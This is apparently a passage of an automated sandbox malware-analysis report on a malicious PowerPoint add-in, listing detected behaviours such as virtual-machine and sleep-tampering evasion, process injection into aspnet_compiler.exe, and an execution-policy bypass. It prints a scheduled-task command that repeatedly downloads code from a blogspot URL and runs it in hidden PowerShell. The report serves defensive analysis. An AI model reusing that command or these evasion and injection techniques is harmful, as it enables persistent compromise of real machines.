          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Function Chain: threadDelayed,memAlloc,systemQueried,systemQueried,memAlloc,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,processSet,memAlloc,memAlloc,memAlloc,memAlloc,memAlloc,processSet,processSet
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Function Chain: threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,processSet,memAlloc,memAlloc,memAlloc,memAlloc,memAlloc,processSet,processSet,keyOpened,keyValueQueried,memAlloc,memAlloc,memAlloc
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492 Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6636 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144 Thread sleep time: -17524406870024063s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672 Thread sleep time: -11068046444225724s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800 Thread sleep count: 2313 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4800 Thread sleep count: 7039 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4712 Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172 Thread sleep count: 62 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172 Thread sleep time: -1860000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe TID: 2172 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2920
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5017
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2934
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6734
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2555
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6661
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2313
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7039
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Thread delayed: delay time: 30000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: powershell.exe, 00000009.00000003.490643709.000000000A5EB000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.392063687.000000000528C000.00000004.00000001.sdmp Binary or memory string: Hyper-V
          Source: ModuleAnalysisCache.9.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000009.00000003.490643709.000000000A5EB000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.392063687.000000000528C000.00000004.00000001.sdmp Binary or memory string: d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: ModuleAnalysisCache.9.dr Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: ModuleAnalysisCache.9.dr Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 400000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 402000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 446000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 448000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: C21008
          Bypasses PowerShell execution policy
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1
          Injects a PE file into a foreign processes
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe base: 400000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: aspnet_compiler.exe, 0000001F.00000002.594626986.00000000019E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
